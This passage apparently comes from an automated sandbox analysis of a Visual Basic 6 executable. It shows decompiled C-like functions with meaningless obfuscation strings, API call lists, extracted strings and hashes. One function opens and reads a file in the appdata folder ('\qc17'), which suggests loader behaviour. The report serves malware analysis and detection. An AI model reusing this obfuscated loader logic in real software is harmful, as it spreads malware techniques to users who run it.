					_t154 = _t154 + 0xc;
					if( *0x4223c0 != 0) {
						_v204 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v204 = 0x4223c0;
					}
					_v184 =  *_v204;
					_t119 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v48);
					asm("fclex");
					_v188 = _t119;
					if(_v188 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v184);
						_push(_v188);
						L004017C8();
						_v208 = _t119;
					}
					_v192 = _v48;
					_t124 =  *((intOrPtr*)( *_v192 + 0x70))(_v192,  &_v180);
					asm("fclex");
					_v196 = _t124;
					if(_v196 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4025ac);
						_push(_v192);
						_push(_v196);
						L004017C8();
						_v212 = _t124;
					}
					_v28 = _v180;
					L004017C2();
				}
				_v72 = 0x93;
				_v80 = 2;
				_v136 = L"SUPERSERIOUS";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push(0xb2);
				_push( &_v64);
				_push( &_v96);
				L0040168A();
				_v168 = 0x454add;
				_v176 = 0x8003;
				_push( &_v96);
				_t99 =  &_v112;
				_push(_t99);
				L0040163C();
				_push(_t99);
				_t100 =  &_v176;
				_push(_t100);
				L00401738();
				_v184 = _t100;
				_push( &_v96);
				_push( &_v80);
				_push( &_v64);
				_push(3);
				L00401840();
				_t104 = _v184;
				if(_t104 != 0) {
					_v136 = L"Skovede1";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L00401852();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_t104 =  &_v64;
					_push(_t104);
					_push(2);
					L00401840();
					_push(L"galopbanernes");
					L004017E0();
					_push(_t104);
					L004016B4();
					L0040183A();
				}
				_v32 = 0xd66;
				_push(0x41fc33);
				L00401846();
				L00401846();
				L00401846();
				return _t104;
			}

0x0041f8f3
0x0041f8fe
0x0041f8ff
0x0041f90b
0x0041f913
0x0041f916
0x0041f91d
0x0041f927
0x0041f93a
0x0041f93f
0x0041f942
0x0041f943
0x0041f94d
0x0041f952
0x0041f953
0x0041f958
0x0041f95f
0x0041f965
0x0041f96f
0x0041f977
0x0041f985
0x0041f98b
0x0041f995
0x0041f9a8
0x0041f9b0
0x0041f9b4
0x0041f9b5
0x0041f9bd
0x0041f9be
0x0041f9c8
0x0041f9d0
0x0041f9d4
0x0041f9d5
0x0041f9d7
0x0041f9dc
0x0041f9e6
0x0041fa03
0x0041f9e8
0x0041f9e8
0x0041f9ed
0x0041f9f2
0x0041f9f7
0x0041f9f7
0x0041fa15
0x0041fa2d
0x0041fa30
0x0041fa32
0x0041fa3f
0x0041fa61
0x0041fa41
0x0041fa41
0x0041fa43
0x0041fa48
0x0041fa4e
0x0041fa54
0x0041fa59
0x0041fa59
0x0041fa6b
0x0041fa86
0x0041fa89
0x0041fa8b
0x0041fa98
0x0041faba
0x0041fa9a
0x0041fa9a
0x0041fa9c
0x0041faa1
0x0041faa7
0x0041faad
0x0041fab2
0x0041fab2
0x0041fac8
0x0041facf
0x0041facf
0x0041fad4
0x0041fadb
0x0041fae2
0x0041faec
0x0041faff
0x0041fb07
0x0041fb08
0x0041fb10
0x0041fb14
0x0041fb15
0x0041fb1a
0x0041fb24
0x0041fb31
0x0041fb32
0x0041fb35
0x0041fb36
0x0041fb3b
0x0041fb3c
0x0041fb42
0x0041fb43
0x0041fb48
0x0041fb52
0x0041fb56
0x0041fb5a
0x0041fb5b
0x0041fb5d
0x0041fb65
0x0041fb6e
0x0041fb70
0x0041fb7a
0x0041fb8d
0x0041fb95
0x0041fb99
0x0041fb9a
0x0041fba2
0x0041fba3
0x0041fbad
0x0041fbb5
0x0041fbb6
0x0041fbb9
0x0041fbba
0x0041fbbc
0x0041fbc4
0x0041fbc9
0x0041fbce
0x0041fbcf
0x0041fbd9
0x0041fbd9
0x0041fbde
0x0041fbe4
0x0041fc1d
0x0041fc25
0x0041fc2d
0x0041fc32

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F90B
__vbaVarDup.MSVBVM60 ref: 0041F93A
#667.MSVBVM60(?), ref: 0041F943
__vbaStrMove.MSVBVM60(?), ref: 0041F94D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F958
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F96F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F977
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F9A8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F9B5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F9BE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F9C8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F9D7
__vbaNew2.MSVBVM60(0040259C,004223C0), ref: 0041F9F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041FA54
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041FAAD
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041FACF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041FAFF
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB15
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB36
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB43
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB5D
__vbaVarDup.MSVBVM60 ref: 0041FB8D
#522.MSVBVM60(?,?), ref: 0041FB9A
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FBA3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FBAD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FBBC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041FBC9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041FBCF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041FBD9
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC1D
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC25
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC2D

Strings

galopbanernes, xrefs: 0041FBC4
appdata, xrefs: 0041F91D
Picry, xrefs: 0041F953
Langfredagene5, xrefs: 0041F98B
f, xrefs: 0041FBDE
SUPERSERIOUS, xrefs: 0041FAE2
Skovede1, xrefs: 0041FB70

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: 3ef2b7d5c46d8022f39fbf57bfa629afe8e82506dd976061f03c2d49f8e79b24
Instruction ID: 9f4e8340e245fce694b74ec5e0d5aca1eee28677b39bd58d7b4af9f48fe85b1a
Opcode Fuzzy Hash: 3ef2b7d5c46d8022f39fbf57bfa629afe8e82506dd976061f03c2d49f8e79b24
Instruction Fuzzy Hash: 0C81FA72D00218ABDB14EB91CC45FDEB7B9BF04304F1085AAE505B71A1EB785B89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC50, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041FC50(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				char* _v100;
				char _v108;
				char* _v116;
				char _v124;
				short _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				signed int _t69;
				signed int _t73;
				short _t77;
				char* _t82;
				intOrPtr _t111;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				L00401540();
				_v12 = _t111;
				_v8 = 0x4013b0;
				if( *0x4223c0 != 0) {
					_v164 = 0x4223c0;
				} else {
					_push(0x4223c0);
					_push(0x40259c);
					L004017CE();
					_v164 = 0x4223c0;
				}
				_v144 =  *_v164;
				_t69 =  *((intOrPtr*)( *_v144 + 0x4c))(_v144,  &_v44);
				asm("fclex");
				_v148 = _t69;
				if(_v148 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x40258c);
					_push(_v144);
					_push(_v148);
					L004017C8();
					_v168 = _t69;
				}
				_v152 = _v44;
				_t73 =  *((intOrPtr*)( *_v152 + 0x28))(_v152);
				asm("fclex");
				_v156 = _t73;
				if(_v156 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402ec8);
					_push(_v152);
					_push(_v156);
					L004017C8();
					_v172 = _t73;
				}
				L004017C2();
				_push(0x3139);
				L0040169C();
				L0040183A();
				_push(0x64);
				_push(_v32);
				L00401750();
				L0040183A();
				_push(_t73);
				_push(L"Sciuroid8");
				L0040172C();
				asm("sbb eax, eax");
				_v144 =  ~( ~( ~_t73));
				L00401846();
				_t77 = _v144;
				if(_t77 != 0) {
					_v100 = L"appdata";
					_v108 = 8;
					L0040184C();
					_push( &_v60);
					_push( &_v76);
					L0040171A();
					_v116 = L"\\qc17";
					_v124 = 8;
					_push( &_v76);
					_push( &_v124);
					_t82 =  &_v92;
					_push(_t82);
					L00401720();
					_push(_t82);
					L00401834();
					L0040183A();
					_push(_t82);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v24);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0x59);
					_push( &_v60);
					L00401708();
					_t77 =  &_v60;
					_push(_t77);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"Rutiner");
				L004017EC();
				_v28 = _t77;
				_push(0x41fecc);
				L00401846();
				L00401846();
				L00401846();
				return _t77;
			}

0x0041fc55
0x0041fc60
0x0041fc61
0x0041fc6d
0x0041fc75
0x0041fc78
0x0041fc86
0x0041fca3
0x0041fc88
0x0041fc88
0x0041fc8d
0x0041fc92
0x0041fc97
0x0041fc97
0x0041fcb5
0x0041fccd
0x0041fcd0
0x0041fcd2
0x0041fcdf
0x0041fd01
0x0041fce1
0x0041fce1
0x0041fce3
0x0041fce8
0x0041fcee
0x0041fcf4
0x0041fcf9
0x0041fcf9
0x0041fd0b
0x0041fd1f
0x0041fd22
0x0041fd24
0x0041fd31
0x0041fd53
0x0041fd33
0x0041fd33
0x0041fd35
0x0041fd3a
0x0041fd40
0x0041fd46
0x0041fd4b
0x0041fd4b
0x0041fd5d
0x0041fd62
0x0041fd67
0x0041fd71
0x0041fd76
0x0041fd78
0x0041fd7b
0x0041fd85
0x0041fd8a
0x0041fd8b
0x0041fd90
0x0041fd97
0x0041fd9d
0x0041fda7
0x0041fdac
0x0041fdb5
0x0041fdbb
0x0041fdc2
0x0041fdcf
0x0041fdd7
0x0041fddb
0x0041fddc
0x0041fde1
0x0041fde8
0x0041fdf2
0x0041fdf6
0x0041fdf7
0x0041fdfa
0x0041fdfb
0x0041fe00
0x0041fe01
0x0041fe0b
0x0041fe10
0x0041fe11
0x0041fe13
0x0041fe15
0x0041fe1a
0x0041fe22
0x0041fe2a
0x0041fe2e
0x0041fe32
0x0041fe33
0x0041fe35
0x0041fe3d
0x0041fe42
0x0041fe43
0x0041fe45
0x0041fe4a
0x0041fe4c
0x0041fe51
0x0041fe56
0x0041fe57
0x0041fe5c
0x0041fe5f
0x0041fe60
0x0041fe6a
0x0041fe72
0x0041fe72
0x0041fe77
0x0041fe7c
0x0041fe81
0x0041fe85
0x0041feb6
0x0041febe
0x0041fec6
0x0041fecb

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FC6D
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00401546), ref: 0041FC92
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000004C), ref: 0041FCF4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 0041FD46
__vbaFreeObj.MSVBVM60 ref: 0041FD5D
#697.MSVBVM60(00003139), ref: 0041FD67
__vbaStrMove.MSVBVM60(00003139), ref: 0041FD71
#618.MSVBVM60(?,00000064,00003139), ref: 0041FD7B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041FD85
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FD90
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDA7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDCF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDDC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDFB
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE01
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE0B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE1A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE22
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041FE35
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041FE45
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041FE4C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE57
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE60
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE6A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE72
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE7C
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEB6
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEBE
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEC6

Strings

appdata, xrefs: 0041FDBB
Sciuroid8, xrefs: 0041FD8B
Rutiner, xrefs: 0041FE77
\qc17, xrefs: 0041FDE1

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: a3810d19d4ca8b7809da29301cd96011e8d686186eb5e73da6d7b49df30c274e
Instruction ID: 6286e1cac6bc4842638b7be6c62ba3b45a710a2077f63fb351c5ba841ef899ad
Opcode Fuzzy Hash: a3810d19d4ca8b7809da29301cd96011e8d686186eb5e73da6d7b49df30c274e
Instruction Fuzzy Hash: C3510D71900218AFDB10EBA1CD46FDEB7B8AF14708F10817AF105B71E1DB785A85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE1A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041EE1A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				short _v40;
				char _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				void* _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				char* _t86;
				char* _t87;
				signed int _t91;
				signed int _t98;
				short _t102;
				signed int _t108;
				signed int _t113;
				void* _t134;
				void* _t136;
				intOrPtr _t137;

				_t137 = _t136 - 0xc;
				 *[fs:0x0] = _t137;
				L00401540();
				_v16 = _t137;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401546, _t134);
				L00401708();
				_t86 =  &_v44;
				L00401858();
				L004016D8();
				L0040183A();
				L00401846();
				L00401828();
				L00401792();
				_t87 =  &_v48;
				L00401798();
				_v108 = _t87;
				_t91 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v104, _t87, _t86, L"Flimflam", L"Fribords2", _t86, _t86,  &_v64, 1, 0xffffffff, 0,  &_v64, 0xe8);
				asm("fclex");
				_v112 = _t91;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40264c);
					_push(_v108);
					_push(_v112);
					L004017C8();
					_v132 = _t91;
				}
				_v56 = _v104;
				_v64 = 3;
				_push( &_v64);
				_push( &_v80);
				L00401678();
				_push( &_v80);
				L00401834();
				L0040183A();
				L004017C2();
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401840();
				_v56 = 0x7042c;
				_v64 = 3;
				_t98 =  &_v64;
				_push(_t98);
				L004017E6();
				L0040183A();
				_push(_t98);
				_push(L"INVALIDNESS");
				L0040172C();
				asm("sbb eax, eax");
				_v108 =  ~( ~_t98 + 1);
				L00401846();
				L00401828();
				_t102 = _v108;
				if(_t102 != 0) {
					L00401672();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v136 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v136 = 0x4223c0;
					}
					_v108 =  *_v136;
					_t108 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v48);
					asm("fclex");
					_v112 = _t108;
					if(_v112 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v108);
						_push(_v112);
						L004017C8();
						_v140 = _t108;
					}
					_v116 = _v48;
					_t113 =  *((intOrPtr*)( *_v116 + 0x68))(_v116,  &_v100);
					asm("fclex");
					_v120 = _t113;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x4025ac);
						_push(_v116);
						_push(_v120);
						L004017C8();
						_v144 = _t113;
					}
					_t102 = _v100;
					_v40 = _t102;
					L004017C2();
				}
				_push(0x41f09d);
				L00401846();
				L00401846();
				L00401846();
				return _t102;
			}

0x0041ee1d
0x0041ee2c
0x0041ee36
0x0041ee3e
0x0041ee41
0x0041ee48
0x0041ee57
0x0041ee63
0x0041ee72
0x0041ee76
0x0041ee86
0x0041ee90
0x0041ee98
0x0041eea0
0x0041eea5
0x0041eeab
0x0041eeaf
0x0041eeb4
0x0041eec3
0x0041eec6
0x0041eec8
0x0041eecf
0x0041eee8
0x0041eed1
0x0041eed1
0x0041eed3
0x0041eed8
0x0041eedb
0x0041eede
0x0041eee3
0x0041eee3
0x0041eeef
0x0041eef2
0x0041eefc
0x0041ef00
0x0041ef01
0x0041ef09
0x0041ef0a
0x0041ef14
0x0041ef1c
0x0041ef24
0x0041ef28
0x0041ef29
0x0041ef2b
0x0041ef33
0x0041ef3a
0x0041ef41
0x0041ef44
0x0041ef45
0x0041ef4f
0x0041ef54
0x0041ef55
0x0041ef5a
0x0041ef61
0x0041ef66
0x0041ef6d
0x0041ef75
0x0041ef7a
0x0041ef80
0x0041ef86
0x0041ef90
0x0041ef9c
0x0041efb9
0x0041ef9e
0x0041ef9e
0x0041efa3
0x0041efa8
0x0041efad
0x0041efad
0x0041efcb
0x0041efda
0x0041efdd
0x0041efdf
0x0041efe6
0x0041f002
0x0041efe8
0x0041efe8
0x0041efea
0x0041efef
0x0041eff2
0x0041eff5
0x0041effa
0x0041effa
0x0041f00c
0x0041f01b
0x0041f01e
0x0041f020
0x0041f027
0x0041f043
0x0041f029
0x0041f029
0x0041f02b
0x0041f030
0x0041f033
0x0041f036
0x0041f03b
0x0041f03b
0x0041f04a
0x0041f04e
0x0041f055
0x0041f055
0x0041f05a
0x0041f087
0x0041f08f
0x0041f097
0x0041f09c

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE36
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041EE63
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE76
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE86
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE90
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE98
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EEA0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EEA5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EEAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041EEDE
#613.MSVBVM60(?,00000003), ref: 0041EF01
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EF0A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EF14
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EF1C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EF2B
#574.MSVBVM60(00000003), ref: 0041EF45
__vbaStrMove.MSVBVM60(00000003), ref: 0041EF4F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF5A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF6D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF75
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF86
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF90
__vbaNew2.MSVBVM60(0040259C,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EFA8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041EFF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000068), ref: 0041F036
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000068), ref: 0041F055
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F087
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F08F
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F097

Strings

INVALIDNESS, xrefs: 0041EF55
Flimflam, xrefs: 0041EE81
Fribords2, xrefs: 0041EE7C

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: f3033331b7b5841a882ad28fe36af074375b8c63f1e990462f40b42538c18e7c
Instruction ID: 42a8e989c12e80aecfa1cc5b8e89ae9cb5c3b47e7947c4ac95b0f4058153ffdd
Opcode Fuzzy Hash: f3033331b7b5841a882ad28fe36af074375b8c63f1e990462f40b42538c18e7c
Instruction Fuzzy Hash: 7471E671D00218ABDB00EBA5D885BDDBBB8BF08704F50813AF505BB1E2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2C4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041F2C4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char* _v92;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				short _t110;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t130;
				char* _t133;
				signed int _t136;
				intOrPtr _t168;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				L00401540();
				_v12 = _t168;
				_v8 = 0x401368;
				L004017B6();
				L004017B6();
				L004017B6();
				_v92 =  &_v44;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L0040181C();
				_v108 = L"ICHTHYOPOLISM";
				_v116 = 0x8008;
				_push( &_v68);
				_t110 =  &_v116;
				_push(_t110);
				L00401660();
				_v120 = _t110;
				L00401828();
				if(_v120 != 0) {
					if( *0x4223c0 != 0) {
						_v144 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v144 = 0x4223c0;
					}
					_v120 =  *_v144;
					_t118 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t118;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v148 = _t118;
					}
					_v128 = _v52;
					_t123 =  *((intOrPtr*)( *_v128 + 0xd8))(_v128,  &_v48);
					asm("fclex");
					_v132 = _t123;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x4025ac);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v152 = _t123;
					}
					_v140 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040183A();
					L004017C2();
					if( *0x4223c0 != 0) {
						_v156 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v156 = 0x4223c0;
					}
					_v120 =  *_v156;
					_t130 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t130;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v160 = _t130;
					}
					_v128 = _v52;
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v60 = 0x92ac1b00;
					_v56 = 0x5af5;
					_v68 = 6;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 =  &_v68;
					L0040165A();
					L0040183A();
					_t136 =  *((intOrPtr*)( *_v128 + 0x13c))(_v128, _t133, _t133, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe, 0x10);
					asm("fclex");
					_v132 = _t136;
					if(_v132 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4025ac);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v164 = _t136;
					}
					L00401846();
					L004017C2();
					L00401828();
				}
				_v60 = 0x607e9f;
				_v68 = 3;
				_t112 =  &_v68;
				_push(_t112);
				L0040166C();
				L0040183A();
				L00401828();
				_v24 = 0x5b2ec5;
				_push(0x41f5e3);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
